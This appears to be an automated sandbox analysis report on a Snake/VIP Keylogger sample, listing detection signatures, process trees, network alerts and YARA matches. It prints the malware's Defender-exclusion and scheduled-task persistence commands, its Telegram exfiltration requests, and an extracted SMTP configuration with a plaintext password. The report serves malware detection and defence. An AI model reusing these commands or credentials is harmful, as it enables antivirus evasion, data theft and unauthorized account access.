Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VSVy.exe

Overview

General Information

Sample name:VSVy.exe
Analysis ID:1618710
MD5:b2ab62452cfdf6fa8398f51668ae73e9
SHA1:b23a3d5637b131d06ef915f9468e21e9b9432819
SHA256:d4e7b1bcebd9b9150dc206559b929744b9b592d3d62baa7902f3979b60336177
Tags:exeuser-Bastian455_
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VSVy.exe (PID: 764 cmdline: "C:\Users\user\Desktop\VSVy.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)
    • powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1252 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6768 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VSVy.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\VSVy.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)
  • gJfOOh.exe (PID: 4160 cmdline: C:\Users\user\AppData\Roaming\gJfOOh.exe MD5: B2AB62452CFDF6FA8398F51668AE73E9)
    • schtasks.exe (PID: 1120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gJfOOh.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)
    • gJfOOh.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0xb079:$a1: get_encryptedPassword
  • 0xb3a2:$a2: get_encryptedUsername
  • 0xae89:$a3: get_timePasswordChanged
  • 0xaf92:$a4: get_passwordField
  • 0xb08f:$a5: set_encryptedPassword
  • 0xc767:$a7: get_logins
  • 0xc6ca:$a10: KeyLoggerEventArgs
  • 0xc32f:$a11: KeyLoggerEventArgsEventHandler
00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000010.00000002.3903689735.000000000304D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 26 entries
          SourceRuleDescriptionAuthorStrings
          10.2.VSVy.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            10.2.VSVy.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              10.2.VSVy.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2e279:$a1: get_encryptedPassword
              • 0x2e5a2:$a2: get_encryptedUsername
              • 0x2e089:$a3: get_timePasswordChanged
              • 0x2e192:$a4: get_passwordField
              • 0x2e28f:$a5: set_encryptedPassword
              • 0x2f967:$a7: get_logins
              • 0x2f8ca:$a10: KeyLoggerEventArgs
              • 0x2f52f:$a11: KeyLoggerEventArgsEventHandler
              10.2.VSVy.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x3c108:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x3b7ab:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x3ba08:$a4: \Orbitum\User Data\Default\Login Data
              • 0x3c3e7:$a5: \Kometa\User Data\Default\Login Data
              10.2.VSVy.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x2ee87:$s1: UnHook
              • 0x2ee8e:$s2: SetHook
              • 0x2ee96:$s3: CallNextHook
              • 0x2eea3:$s4: _hook
              Click to see the 38 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", ProcessId: 3560, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", ProcessId: 3560, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gJfOOh.exe, ParentImage: C:\Users\user\AppData\Roaming\gJfOOh.exe, ParentProcessId: 4160, ParentProcessName: gJfOOh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", ProcessId: 1120, ProcessName: schtasks.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.116.88.120, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\VSVy.exe, Initiated: true, ProcessId: 6208, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49812
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", ProcessId: 6768, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", ProcessId: 3560, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp", ProcessId: 6768, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T03:36:30.645415+010020600481Malware Command and Control Activity Detected192.168.2.54981250.116.88.120587TCP
              2025-02-19T03:36:30.645415+010020600481Malware Command and Control Activity Detected192.168.2.54995050.116.88.120587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T03:36:56.000295+010028033053Unknown Traffic192.168.2.549733104.21.112.1443TCP
              2025-02-19T03:36:56.773776+010028033053Unknown Traffic192.168.2.549739104.21.112.1443TCP
              2025-02-19T03:36:57.553743+010028033053Unknown Traffic192.168.2.549745104.21.112.1443TCP
              2025-02-19T03:36:58.334745+010028033053Unknown Traffic192.168.2.549751104.21.112.1443TCP
              2025-02-19T03:36:59.108371+010028033053Unknown Traffic192.168.2.549757104.21.112.1443TCP
              2025-02-19T03:36:59.931140+010028033053Unknown Traffic192.168.2.549763104.21.112.1443TCP
              2025-02-19T03:37:00.726883+010028033053Unknown Traffic192.168.2.549769104.21.112.1443TCP
              2025-02-19T03:37:01.509148+010028033053Unknown Traffic192.168.2.549775104.21.112.1443TCP
              2025-02-19T03:37:15.011279+010028033053Unknown Traffic192.168.2.549859104.21.112.1443TCP
              2025-02-19T03:37:15.886794+010028033053Unknown Traffic192.168.2.549865104.21.112.1443TCP
              2025-02-19T03:37:16.662879+010028033053Unknown Traffic192.168.2.549871104.21.112.1443TCP
              2025-02-19T03:37:17.420546+010028033053Unknown Traffic192.168.2.549877104.21.112.1443TCP
              2025-02-19T03:37:18.380991+010028033053Unknown Traffic192.168.2.549883104.21.112.1443TCP
              2025-02-19T03:37:19.245941+010028033053Unknown Traffic192.168.2.549890104.21.112.1443TCP
              2025-02-19T03:37:20.104668+010028033053Unknown Traffic192.168.2.549898104.21.112.1443TCP
              2025-02-19T03:37:20.890304+010028033053Unknown Traffic192.168.2.549904104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T03:36:54.457794+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:55.411007+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:56.207810+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:56.989050+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:57.770303+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:58.551578+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:36:59.317156+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:37:00.145291+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:37:00.942182+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
              2025-02-19T03:37:13.473566+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:14.426556+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:15.285938+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:16.098413+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:16.879815+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:17.629782+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:18.645295+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:19.504658+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              2025-02-19T03:37:20.317149+010028032742Potentially Bad Traffic192.168.2.549845158.101.44.24280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-19T03:37:02.422963+010018100071Potentially Bad Traffic192.168.2.549780149.154.167.220443TCP
              2025-02-19T03:37:21.767796+010018100071Potentially Bad Traffic192.168.2.549908149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587"}
              Source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587", "Version": "4.4"}
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeReversingLabs: Detection: 32%
              Source: VSVy.exeReversingLabs: Detection: 32%
              Source: VSVy.exeVirustotal: Detection: 36%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: contact@gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: Admin174C@GEMS_DRFgemsSA
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: mail.gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: fresh.italian@yandex.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: 587
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor:
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: contact@gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: Admin174C@GEMS_DRFgemsSA
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: mail.gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: fresh.italian@yandex.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: 587
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor:
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: contact@gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: Admin174C@GEMS_DRFgemsSA
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: mail.gemssystems.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: fresh.italian@yandex.com
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor: 587
              Source: 0.2.VSVy.exe.447b420.6.raw.unpackString decryptor:

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org

              Compliance

              barindex
              Source: C:\Users\user\Desktop\VSVy.exeUnpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack
              Source: VSVy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49852 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49908 version: TLS 1.2
              Source: VSVy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 4x nop then jmp 09777EB9h0_2_09777BC7
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 4x nop then jmp 012CF45Dh10_2_012CF2C0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 4x nop then jmp 012CF45Dh10_2_012CF4AC
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 4x nop then jmp 012CFC19h10_2_012CF961
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 4x nop then jmp 04FE72C3h11_2_04FE6FD1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 4x nop then jmp 02D9F45Dh16_2_02D9F2C0
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 4x nop then jmp 02D9F45Dh16_2_02D9F4AC
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 4x nop then jmp 02D9FC19h16_2_02D9F961

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49812 -> 50.116.88.120:587
              Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49950 -> 50.116.88.120:587
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49780 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49908 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.5:49812 -> 50.116.88.120:587
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49845 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49763 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49751 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49898 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49871 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49877 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49775 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49757 -> 104.21.112.1:443
